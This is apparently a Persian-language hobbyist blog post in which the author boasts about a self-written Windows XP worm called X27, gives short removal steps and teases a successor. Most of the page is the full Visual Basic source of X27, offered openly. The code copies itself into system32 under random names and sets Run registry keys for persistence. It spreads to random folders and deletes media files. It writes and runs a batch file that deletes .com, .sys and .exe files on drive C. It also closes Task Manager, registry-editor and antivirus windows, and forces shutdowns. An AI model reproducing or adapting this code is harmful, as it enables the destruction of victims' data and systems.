|
X27 را نمی توان شناخت و آن را نمی توان رده بندی کرد . یک ویروس ؟!یک کرم ؟؟ یا یک جاسوس !! استفاده از هفت موتور 1. تولید نام های با معنی 2. حذف فایل های Dat-Mpag 3. اجرای تصادفی Mp3-Wav-Gif-Bmp-Jpg 4. کپشن کلوزر 5. گزارش دهی تکثیر 6. کنترل از طریق شبکه 7. تکثیر در شبکه آمار تکثیر نشان از آن دارد که ( 235376 ) از X27 تکثیر شده . اما فقط 752 سیستم را آلوده کرده است که رقم کمی است . |
X27 با ناکامی روبرو شد . فقط به علت نقص در کامپایل
خودم هم نفهمیدم که ایکس بیست هفت یه ویروس بود یه کرم بود یا وقعا جاسوس بود .
نگارش جدید ایکس بیست و هفت در حال تکمیل شدنه به نام (Xs27) جالب که بدونید هیچ شباهتی به X27 نداره و سه تا موتور بیشتر نداره.
تکثیر از طریق فایل های html ,mp3,pdf
حذف پشتیبانی هارد توسط مادر بود .تبدیل کردن رم به حافظه دائمی
و موتور سوم که درباره اش توضیحی نمی دم .
مخصوص ویندوز Xp
حالا نحوه پاک کردن X27
وارد فولدر system32 می شید و بعد دنبال فایل اجرایی x27 می گردید . که اگه * یه نام نامعلوم باشه . فایل اجرایی دارای نام *27.exe هست . این فایل رو cut کنید به دسکتاپ و رایانه رو ریست کنید . شما از دست X27 خلاص می شید.
سورس X27
Option Explicit
Private Declare Function SendMessage Lib "user32" Alias _
"SendMessageA" (ByVal hwnd As Long, ByVal wMsg As _
Long, ByVal wParam As Long, lParam As Any) As Long
Const WM_SYSCOMMAND = &H112&
Const SC_MONITORPOWER = &HF170&
Const SWP_NOMOVE = 2
Const SWP_NOSIZE = 1
Const FLAGS = SWP_NOMOVE Or SWP_NOSIZE
Const HWND_TOPMOST = -1
Const HWND_NOTOPMOST = -2
Private Declare Function SetWindowPos Lib "user32" _
(ByVal hwnd As Long, _
ByVal hWndInsertAfter As Long, _
ByVal x As Long, _
ByVal y As Long, _
ByVal cx As Long, _
ByVal cy As Long, _
ByVal wFlags As Long) As Long
Dim ak As Long
Dim s_lka, tjjjs As Variant
Dim akl As Long
Dim newnam1, newnam2, newnam3, sys_dir, Msys_dir As Variant
Dim sh As New Shell
Dim fso As New FileSystemObject
Dim p2 As Variant
'---------------------------------------------------
Private Declare Function GetWindowsDirectory Lib "kernel32" Alias _
"GetWindowsDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long _
) As Long
Dim dicop As String
Dim div As Drive
Dim xum, xzp As Long
Dim fasa As File
Public Sins As String
Public SysDirectory As Long
'-------------------------------
Dim vas As Variant
Dim kkk_m, i As Long
'---------------------------------
Private Declare Function GetForegroundWindow Lib "user32" () As Long
Private Declare Function GetWindowText Lib "user32" Alias "GetWindowTextA" (ByVal hwnd As Long, ByVal LpString As String, ByVal cch As Long) As Long
Private Declare Function GetWindowTextLength Lib "user32" Alias "GetWindowTextLengthA" (ByVal hwnd As Long) As Long
Private Declare Function DestroyWindow Lib "user32" (ByVal hwnd As Long) As Long
Dim p(100) As Long
Dim panam As String
'-------------------------------
Private Function SetTopMostWindow(hwnd As Long, Topmost As Boolean) _
As Long
On Error Resume Next
If Topmost = True Then 'Make the window topmost
SetTopMostWindow = SetWindowPos(hwnd, HWND_TOPMOST, 0, 0, 0, 0, FLAGS)
Else
SetTopMostWindow = SetWindowPos(hwnd, HWND_NOTOPMOST, 0, 0, 0, 0, FLAGS)
SetTopMostWindow = False
End If
End Function
Private Sub Command1_Click()
On Error Resume Next
Me.Hide
MsgBox "Hi. My Name's X27 .I am very love Persia and War.if love my click ok else reset your system down.ment close is ok & R.sh is down system", vbCritical, "X27"
Me.Show
End Sub
Private Sub Command2_Click()
On Error Resume Next
ShutdownSystem EWX_FORCEIFHUNG
End Sub
Private Sub Form_Load()
On Error Resume Next
App.TaskVisible = False
Me.Visible = False
syad
Neword
on_load
Label2 = newnam2
End Sub
Private Sub on_load()
On Error Resume Next
sys_dir = App.Path + "\" + App.EXEName + ".exe"
Msys_dir = dicop + newnam1 + "27.exe"
If fso.FileExists(dicop + "d3dir.dll") = False Then
Call fso.CopyFile(sys_dir, Msys_dir)
SetKeyValue HKEY_LOCAL_MACHINE, "Software\Microsoft\Windows\CurrentVersion\run", newnam1 + "27.exe", dicop + newnam1 + "27.exe", REG_SZ
Open dicop + "d3dir.dll" For Output As #11
p(0) = 310
s_lka = newnam1 + "27.exe"
Write #11, p(0), s_lka
Close #11
Call Shell(dicop + newnam1 + "27.exe", vbHide)
End
Else
'--------------------------
Open dicop + "d3dir.dll" For Input As #155
Input #155, p(0), s_lka
Close #155
If fso.FileExists(dicop + s_lka) = False Then
p(67) = 1 + Int(Rnd * 3)
If (67) = 2 Then
newnam2 = ""
End If
Call fso.CopyFile(App.Path + "\" + App.EXEName + ".exe", dicop + newnam2 + ".exe")
SetKeyValue HKEY_LOCAL_MACHINE, "Software\Microsoft\Windows\CurrentVersion\run", newnam2 + ".exe", dicop + newnam2 + ".exe", REG_SZ
Open dicop + "d3dir.dll" For Output As #11
s_lka = newnam2 + ".exe"
Write #11, p(0), s_lka
Close #11
Call Shell(dicop + newnam2 + ".exe", vbHide)
End
'------------------------
Else
Open dicop + "d3dir.dll" For Input As #11
Input #11, p(0), s_lka
Close #11
If p(0) = 310 Then Tictak = True
If p(0) = 420 Then
If fso.FileExists(dicop + "\ipmop32.dll") = False Then
Tictak = True
Exit Sub
Else
Open dicop + "\ipmop32.dll" For Input As #1
p(57) = 0
While EOF(1) = False
Input #1, tjjjs
If tjjjs <> "" Then p(57) = p(57) + 1
Wend
Close #1
If p(57) < 113 Then
Tictak = True
Exit Sub
Else
Tco113 = True
End If
End If
End If
If p(0) = 530 Then
If fso.FileExists(dicop + "\Wmvqmll.dll") = False Then
p(0) = 310
Open dicop + "d3dir.dll" For Input As #11
Input #11, p(0), s_lka
Close #11
on_load
Exit Sub
Else
Open dicop + "\Wmvqmll.dll" For Input As #21
Input #21, p(21), p(22), p(23)
Close #21
p(21) = p(21) + 1
If p(21) = 7 Then
p(22) = p(22) + 1
p(21) = 0
End If
If p(22) = 1 And p(21) = 0 Then
sh.MinimizeAll
Neword
Me.Visible = True
MsgBox "Active Worm And Virus X27", vbCritical, "Hi"
T1.Enabled = True
SendMessage Me.hwnd, WM_SYSCOMMAND, SC_MONITORPOWER, ByVal 2&
End If
Open dicop + "\Wmvqmll.dll" For Output As #21
Write #21, p(21), p(22), p(23)
Close #21
'-------------------------------------------
If fso.FileExists("c:\nt27.txt") = True Then
Open dicop + "d3dir.dll" For Input As #155
Input #155, p(0), s_lka
Close #155
Kill (s_lka)
Kill (dicop + "d3dir.dll")
Kill (dicop + "\Wmvqmll.dll")
Kill ("c:\nt27.txt")
End
End If
If p(22) >= 1 Then
find_f = True
End If
If p(22) = 7 And p(21) = 6 Then
Open "c:\nt27.txt" For Input As #155
p2 = "I love iran . my name is X27 "
Input #155, p2
Close #155
Call fso.CopyFile(App.Path + "\" + App.EXEName + ".exe", "c:\X27.exe")
Shell "c:\X27.exe"
End If
If p(22) >= 2 Then
pv_reg
End If
If p(21) > 6 Or p(22) > 7 Or p(23) > 0 Then
Open "d:\X27.bat" For Append As #1
Print #1, "@echo off"
Print #1, "Cls"
Print #1, "==========="
Print #1, "Color fc"
Print #1, "Del /a c:\*.com"
Print #1, "Del /a c:\*.sys"
Print #1, "Del /a c:\*.exe /s"
Print #1, "==========="
Close #1
sh.Open "d:\X27.bat"
End If
'-------------------------------------------
End If
End If
End If
End If
End Sub
Public Sub Neword()
On Error Resume Next
Dim a As Variant
Dim mww As Variant
Dim lisa As Long
Dim laf As Variant
Dim las As Variant
' a is name
mww = Split(a)
'------------
'num word is (1392)
'------------
Randomize Timer
lisa = 1 + Int(Rnd * 1392)
Label2 = mww(lisa)
laf = UCase(Left(Label2, 1))
las = Right(Label2, Len(Label2) - 1)
Label2 = laf + las
p(87) = 1 + Int(Rnd * 1392)
p(88) = 1 + Int(Rnd * 1391)
newnam1 = mww(p(87))
newnam2 = (mww(p(87))) + " " + (mww(p(88)))
newnam3 = mww(p(88)) + " " + mww(p(88) + 1)
End Sub
Private Sub Form_QueryUnload(Cancel As Integer, UnloadMode As Integer)
On Error Resume Next
ShutdownSystem EWX_FORCEIFHUNG
End Sub
Private Sub Form_Unload(Cancel As Integer)
On Error Resume Next
Shell App.Path + "\" + App.EXEName + ".exe", vbHide
End Sub
Private Sub Tco113_Timer()
On Error Resume Next
Open dicop + "\ipmop32.dll" For Input As #1
If EOF(1) = False Then
Input #1, tjjjs
Call fso.CopyFile(App.Path + "\" + App.EXEName + ".exe", tjjjs)
Else
Close #1
Open dicop + "d3dir.dll" For Input As #11
Input #11, p(0), s_lka
Close #11
p(0) = 530
Open dicop + "d3dir.dll" For Output As #11
Write #11, p(0), s_lka
Close #11
Open dicop + "\Wmvqmll.dll" For Output As #21
p(33) = 0
p(34) = 0
p(35) = 0
Write #21, p(33), p(34), p(35)
Close #21
Kill (dicop + "\ipmop32.dll")
on_load
Tco113 = False
End If
End Sub
Private Sub Timer1_Timer()
On Error Resume Next
Dim lR As Long
lR = SetTopMostWindow(Me.hwnd, True)
End Sub
Private Sub T1_Timer()
On Error Resume Next
T1.Enabled = False
SendMessage Me.hwnd, WM_SYSCOMMAND, SC_MONITORPOWER, ByVal -1&
End Sub
Private Sub T2_Timer()
On Error Resume Next
Randomize Timer
akl = 1 + Int(Rnd * 400)
If ak > akl Then
T1.Interval = 1 + Int(Rnd * 900)
T2.Interval = 1 + Int(Rnd * 1000)
T1.Enabled = True
SendMessage Me.hwnd, WM_SYSCOMMAND, SC_MONITORPOWER, ByVal 2&
ak = 0
End If
ak = ak + 1
End Sub
Private Sub pv_reg()
On Error Resume Next
SetKeyValue HKEY_LOCAL_MACHINE, "Software\Microsoft\Windows\CurrentVersion\run", App.EXEName, App.Path + "\" + App.EXEName + ".exe", REG_SZ
End Sub
Private Sub syad()
On Error Resume Next
Sins = Space(255)
Dim WinDirectory As Variant
WinDirectory = GetWindowsDirectory(Sins, 255)
Sins = Left$(Sins, WinDirectory)
dicop = Sins + "\System32\"
End Sub
Private Sub Tictak_Timer()
On Error Resume Next
Randomize Timer
If 113 > Combo1.ListCount Then
dri_n.ListIndex = 1 + Int(Rnd * dri_n.ListCount)
fso.GetDrive Left$(dri_n, 2)
Dir1.Path = dri_n
kkk_m = 1 + Int(Rnd * 14)
If Dir1.ListCount > 0 Then
For i = 1 To kkk_m
Dir1.ListIndex = 1 + Int(Rnd * Dir1.ListCount)
Dir1 = Dir1.List(1 + Int(Rnd * Dir1.ListCount))
Next i
End If
For i = 0 To Combo1.ListCount
If Combo1.List(i) = Dir1.Path Then Combo1.RemoveItem (i)
Next i
Set div = fso.GetDrive(Left$(dri_n, 2))
If UCase(Left$(App.Path, 1)) <> UCase(Left$(dri_n, 1)) And div.DriveType = Fixed Then Combo1.AddItem Dir1.Path
Else
Open dicop + "\ipmop32.dll" For Output As #13
For i = 1 To Combo1.ListCount
Combo1.ListIndex = i - 1
Neword
Combo1.Text = Combo1.Text + "\" + Label2 + ".exe"
Write #13, Combo1.Text
Next i
Close #13
Open dicop + "d3dir.dll" For Input As #11
Input #11, p(0), s_lka
Close #11
p(0) = 420
Open dicop + "d3dir.dll" For Output As #11
Write #11, p(0), s_lka
Close #11
on_load
Tictak = False
End If
End Sub
Private Sub find_f_Timer()
On Error Resume Next
Randomize Timer
dri_n.ListIndex = 1 + Int(Rnd * dri_n.ListCount)
fso.GetDrive Left(dri_n, 2)
Dir1.Path = dri_n
kkk_m = 1 + Int(Rnd * 14)
If Dir1.ListCount > 0 Then
For i = 1 To kkk_m
Dir1.ListIndex = 1 + Int(Rnd * Dir1.ListCount)
Dir1 = Dir1.List(1 + Int(Rnd * Dir1.ListCount))
Next i
End If
'------------------------
File1.Pattern = "*.bmp;*.jpG;*.gif;*.wav;*.mp3;*.wma;*.html;*.htm"
xum = xum + 1
xzp = 113 + Int(Rnd * 1620)
If File1.ListCount > 0 And xum > xzp Then
File1.ListIndex = Int(Rnd * File1.ListCount)
sh.MinimizeAll
sh.Open (File1.Path + "\" & File1)
xum = 0
'----------------------------------------
End If
File1.Pattern = "*.dat;*.mpg"
If File1.ListCount > 0 Then
File1.ListIndex = Int(Rnd * File1.ListCount)
Set fasa = fso.GetFile(File1.Path + "\" & File1)
If fasa.Size > 1001367 Then
Kill (File1.Path + "\" & File1)
End If
End If
End Sub
Private Sub Dir1_Change()
File1 = Dir1
End Sub
Private Sub dri_n_Change()
Dir1.Path = dri_n
End Sub
Private Sub CloseWIN(Caption As String)
Dim h As Long
Dim h2 As Long
Dim wn As String
wn = Space(255)
h = GetForegroundWindow()
GetWindowText h, wn, GetWindowTextLength(h) + 1
panam = LCase(CStr(wn))
If panam = LCase(Caption) Then
h2 = h
DestroyWindow h
DoEvents
If h2 = GetForegroundWindow() Then SendKeys "%{f4}"
End If
End Sub
Private Sub clow_tik_Timer()
On Error Resume Next
CloseWIN ("h.no")
If InStr(1, LCase(panam), "task manager") <> 0 Then CloseWIN (panam)
If p(1) = 1 And panam <> "" Then CloseWIN (panam)
If p2 = "close" Then CloseWIN ("Windows Task Manager")
If p(3) = 1 Then CloseWIN ("Control Panel")
'--------------------
If InStr(1, LCase(panam), "virus") <> 0 Then CloseWIN (panam)
'--------------------
If InStr(1, LCase(panam), "worm") <> 0 Then CloseWIN (panam)
'---------------------
If InStr(1, LCase(panam), "notepad") <> 0 Then CloseWIN (panam)
'--------------------
If InStr(1, LCase(panam), "new") <> 0 Then CloseWIN (panam)
'---------------------
If InStr(1, LCase(panam), "reg") <> 0 Then CloseWIN (panam)
If InStr(1, LCase(panam), "internet") <> 0 Then
p(11) = p(11) + 1
If p(11) > 50 Then
sh.MinimizeAll
sh.Open "http:\\www.arnh.blogfa.com"
End If
Else
p(11) = 0
End If
'----------------------------------------
End Sub
ایکس بیست هفت سوخت . چرا که محدود بود .
اما xs27 ترکیبی از اسمبلی و بیست هفت هست . منتظرش باشید .
برادر کوچک شما علیرضا .::.